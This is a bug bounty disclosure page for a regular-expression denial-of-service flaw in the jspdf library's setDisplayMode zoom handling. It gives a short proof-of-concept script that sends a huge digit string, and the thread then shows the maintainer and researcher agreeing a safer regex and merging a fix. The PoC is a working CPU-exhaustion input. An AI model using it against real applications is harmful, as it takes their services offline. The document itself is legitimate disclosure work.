Inefficient Regular Expression Complexity in parallax/jspdf

Valid

Reported on Jan 16th 2022


Description

The jspdf package is vulnerable to ReDoS (regular expression denial of service). An attacker who can supply a crafted zoom value to the zoom-mode handling (reached through the public setDisplayMode API, as the proof of concept below shows) can make the application spend an excessive amount of CPU time in a backtracking regular expression.

Proof of Concept

// PoC.js
// Run with: node PoC.js (after `npm install jspdf`)
const { jsPDF } = require("jspdf");

const doc = new jsPDF({ orientation: "landscape", floatPrecision: 2 });

// A 150,000-character digit string with no trailing "%" is checked against
// the percentage zoom pattern, which backtracks quadratically before it
// finally fails to match; the call pins the CPU for a long time.
doc.setDisplayMode("300".repeat(50000));

Impact

This vulnerability can exhaust CPU on a single crafted call, leaving the process unresponsive and, under resource limits, crashing it.

We are processing your report and will contact the parallax/jspdf team within 24 hours. 4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
We have contacted a member of the parallax/jspdf team and are waiting to hear back 4 months ago
parallax/jspdf maintainer
4 months ago

Maintainer


Thanks for the report.

The vulnerability boils down to the regular expression /^\d*\.?\d*%$/, which is slow, because of the ambiguity caused by \.?. The regular expression can be replaced with something like this:

/^(?:\d+\.\d*|\d*\.\d+|\d+)%$/

This regexp performs much better, as can be seen here: https://jsbench.me/0gkylc9kzt/1

How do we continue from here?

Yeting Li
4 months ago

Researcher


Hi @maintainer, I just verified that the repaired regular expression is safe. You can mark this issue as valid. Thanks a lot!

parallax/jspdf maintainer validated this vulnerability 4 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
parallax/jspdf maintainer
4 months ago

Maintainer


Done. @Yeting Li would you also like to prepare a pull request for the fix?

Yeting Li
4 months ago

Researcher


Hi @maintainer, I'm very glad to prepare a PR for the fix.

parallax/jspdf maintainer
4 months ago

Maintainer


Thanks.

Yeting Li
4 months ago

Researcher


I submitted a PR (please see the link https://github.com/parallax/jsPDF/pull/3366)

But there is a test case on Node 10, Node 14 that fails.

Yeting Li
4 months ago

Researcher


Thank you for your help. I submitted a new PR (please see https://github.com/parallax/jsPDF/pull/3368)

parallax/jspdf maintainer
4 months ago

Maintainer


Thanks. I've merged it now and will release the fix soon. Is there anything left to do? E.g. mark it as resolved?

Yeting Li
4 months ago

Researcher


Yes, you can mark it as resolved. Thanks a lot.

parallax/jspdf maintainer confirmed that a fix has been merged on 7315cc 4 months ago
The fix bounty has been dropped
jspdf.node.js#L1717 has been validated
jspdf.umd.js#L1816 has been validated
parallax/jspdf maintainer
4 months ago

Maintainer


I couldn't select you as the person who fixed it. How can I do that?
